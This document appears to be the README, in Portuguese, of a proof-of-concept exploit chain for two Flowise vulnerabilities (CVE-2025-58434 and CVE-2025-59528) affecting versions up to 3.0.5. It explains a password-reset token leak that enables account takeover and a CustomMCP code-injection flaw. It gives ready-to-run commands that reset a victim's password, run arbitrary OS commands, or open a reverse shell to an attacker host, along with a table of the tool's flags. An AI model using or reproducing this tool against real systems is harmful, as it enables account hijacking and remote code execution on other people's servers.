
CVE-2025-58434 e CVE-2025-59528 — PoC de encadeamento
Cadeia de exploração para duas vulnerabilidades afetando Flowise <= 3.0.5.
O endpoint de redefinição de senha retorna um token válido de redefinição de senha na resposta da API sem exigir autenticação. Um atacante com conhecimento de um endereço de e-mail válido pode redefinir a senha de qualquer conta sem interação do usuário.
O nó CustomMCP passa entrada controlada pelo usuário diretamente para um construtor Function() com privilégios totais do Node.js. Um usuário autenticado com uma chave de API válida pode executar comandos arbitrários do sistema operacional como o usuário do processo Flowise.
Corrigido em: Flowise 3.0.6
pip install requestsCadeia ATO completa (redefine senha, solicita chave de API, dispara reverse shell):
python3 flowise_chain.py -t http://target -e [email protected]
Apenas RCE (se você já tiver uma chave de API):
python3 flowise_chain.py -t http://target --api-key <KEY> -c "id"
Reverse shell com chave existente:
python3 flowise_chain.py -t http://target --api-key <KEY> --lhost 10.0.0.1 --lport 4444
| Flag | Descrição |
|---|---|
-t, --target | URL alvo |
-e, --email | E-mail da conta alvo (aciona a cadeia ATO) |
--api-key | Fornecer chave de API diretamente (pula a ATO) |
-c, --command | Comando a executar |
--lhost | IP do atacante para reverse shell |
--lport | Porta do atacante para reverse shell (padrão: 4444) |
--new-password | Senha a definir durante a redefinição (padrão: Pwn3d!2026) |
-k, --insecure | Ignorar verificação TLS |
Devido a uma peculiaridade no Flowise 3.0.5, o endpoint de API de redefinição de senha não atualiza imediatamente a credencial aceita pelo endpoint de login. O script pausa após a redefinição e solicita que você faça login manualmente na interface e copie a chave de API de /apikey.